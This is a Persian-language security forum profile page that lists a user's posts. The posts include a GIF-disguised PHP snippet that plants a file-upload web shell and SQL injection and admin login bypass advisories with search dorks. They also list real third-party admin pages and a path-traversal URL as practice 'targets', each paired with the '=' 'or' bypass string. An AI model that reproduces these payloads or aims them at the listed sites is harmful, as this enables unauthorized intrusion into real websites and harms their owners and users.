رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Pi.Hack

Retired Admin
  • تعداد ارسال ها

    216
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    5

آخرین بار برد Pi.Hack در اسفند 13 2020

Pi.Hack یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

8 Neutral

12 دنبال کننده

درباره Pi.Hack

  • تاریخ تولد ۹۸/۱۲/۰۸

Converted

  • Name
    Poya
  • Main os
    Windows
  • Programming language
    خیر
  • Skype
    uid.root

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. Pi.Hack

    Shell code as plain text

    در ادامه صحبت 0xD0ctor عزیز میتونید از قطعه کد زیر برای اپلود فایل در هر دایرکتوری استفاده کنید GIF89a1 <?php $fp = fopen("../../pi.php","w"); $code='<?php if (isset($_FILES["userfile"])) { $dir=$_POST["dir"]; if($dir == "" || !isset($dir)) $dir=getcwd(); $uploadfile=$dir."/".basename($_FILES["userfile"]["name"]); if (move_uploaded_file($_FILES["userfile"]["tmp_name"],$uploadfile)) { echo "Uploaded: ". "Name: ".$_FILES["userfile"]["name"]."<br>\n". "Type: ".$_FILES["userfile"]["type"]."<br>\n". "Size: ".$_FILES["userfile"]["size"]." bytes<br>\n"; } else print "Error uploading file: ".$_FILES["userfile"]["name"].""; echo "<hr>"; } ?> <form enctype="multipart/form-data" method="POST"> Upload New File <input type="file" name="userfile"/> <input type="submit" value="Upload"/> <br><br> </form>'; if($fp){ fwrite($fp,$code); } fclose($fp); remotup.rar
  2. Pi.Hack

    Target

    سلام لطفا مطالبتون رو در تایپیک مربوطه بزارین و تایپیک جدید باز نکنین بخش مربوط به تارگت های تمرینی : https://iran-cyber.net/forums/topic/6-target-trainings/page/61
  3. Pi.Hack

    indowebhub Cms Sql Injection

    https://cxsecurity.com/issue/WLB-2020070149 # Title: indowebhub Cms Sql Injection # Author: Iran Cyber Security Group # date: 2020-07-28 # Vendor Homepage: https://indowebhub.com # Tested on: Windows # Category : Web Application Bugs # Discovered by : Pi.hack # Dork : "Powered By www.indowebhub.com" & "Created by Indowebhub" ------------------------------------------------------------------------------ # Proof : Search Dorks And Select A Target # Demo : http://www.manalitourismonline.com/honeymoon_package_detail.php?honeymoon_id=3' http://www.tipsedu.in/nursing.php?categories_id=3' # Admin Page : site.com/admin or Site.com/cms ------------------------------------------------------------------------------ # Offecial Website: https://iran-cyber.net
  4. Pi.Hack

    در زمینه هک چت روم های E-chat کسی وارده ؟

    سلام دوستان اولا که قبل شروع یک تایپیک سرچ کنید که جوابتونو بگیرین یک تایپیک دیگ در همین موضوع بود که همین سوال شمارو مطرح کردن و دوستان تا جایی کمک کردن https://iran-cyber.net/forums/threads/%D9%87%D9%80%D9%80%DA%A9-%DA%86%D8%AA%D8%B1%D9%88%D9%85.3870/ طبق چیزی که بنده اطلاع دارم خیلی وقته چت روم ها امنیت رو بالا بردن به نظرم باگ پابلیک خطرناکی وجود نداره بهترین کار دانلود اسکریپت چت روم هست و این که خودتون با علم برنامه نویسی که دارین دنبال آسیب بگردین
  5. سلام دوست عزیز اگر منظورتون افزونه مشابه هست Tamper Data , Burp Suite
  6. Pi.Hack

    .;تاپیک سوالات مخصوص SqL:.

    سلام دوست عزیز چند دلیل میتونه داشته باشه اولا که بعضی وقتا ادمین سایت میاد یک تیبل تقلبی میسازه که نفوذ گر رو گمراه کنه و ممکنه یوز پس داخل یک ستون دیگری باشه که حتی اسم ستون هم نشون دهنده وجود یوزر و پسورد نباشه دوما که بعضی سایت ها ممکنه دچاره مشکل شده باشن و سایت به دیتابیس وصل نباشه قسمت ادمین پیج و باز هم لاگین نکنه دنبال یوزر و پسورد داخل سایر ستون ها بگردید یا اطمینان حاصل کنید که اطلاعات به دست اوردتونو درست وارد میکنین حتی ممکنه یک لاگین پیج فیک هم وجود داشته باشه و شما اون رو پیدا کرده باشین با اطمینان نمیشه گفت اگر ممکنه تارگت رو بزارین که دقیق تر برسی بشه
  7. دوست عزیز لطفا مطالب رو خودتون زحمت بکشین و کپی نکنید و در صورت کپی منبع را ذکر کنید دفه بعد اخطار دریافت خواهید کرد
  8. دوست عزیز لطفا مطالب رو خودتون زحمت بکشین و کپی نکنید و در صورت کپی منبع را ذکر کنید دفه بعد اخطار دریافت خواهید کرد
  9. slm dash ara am telegram ye pm bde karet dram Merc @mrara1996
  10. Pi.Hack

    Local Root Exploiter

    دوست عزیز میتونین از این آموزش استفاده کنین No back connect - root.zip
  11. Pi.Hack

    Target Trainings

    LFD http://www.verdanttelemetry.com/download_file.php?fname=../lib/conmanager.php
  12. https://cxsecurity.com/issue/WLB-2017100100 ########################### # Exploit Title: TravelHungama Cms Admin Login Bypass # Google Dork: Powered By: TravelHungama # Date: 2017/10/12 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.travelhungama.com/ # Version: All Version # Tested on: Win # CVE : N/A ########################### # Exploit : # Search Google Dork And Select A Target # Admin Page : site.com/admin # Username & Password : '=' 'or' # Enjoy ########################### #Discovered by : Iran Cyber Security Group ###########################
  13. Pi.Hack

    Target Trainings

    http://www.house2homeuk.com/admin/login.php http://www.accordeng.com/admin/ http://www.event1inc.net/caffeine/ https://www.otakunews.com/admin/ http://www.ardmoreconventioncenter.com/caffeine User & Pass '=' 'or'
  14. سلام نیستی خبری ازت نداریم تلگرام پی ام بده کارت دارم @B0ridam منتظرم

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...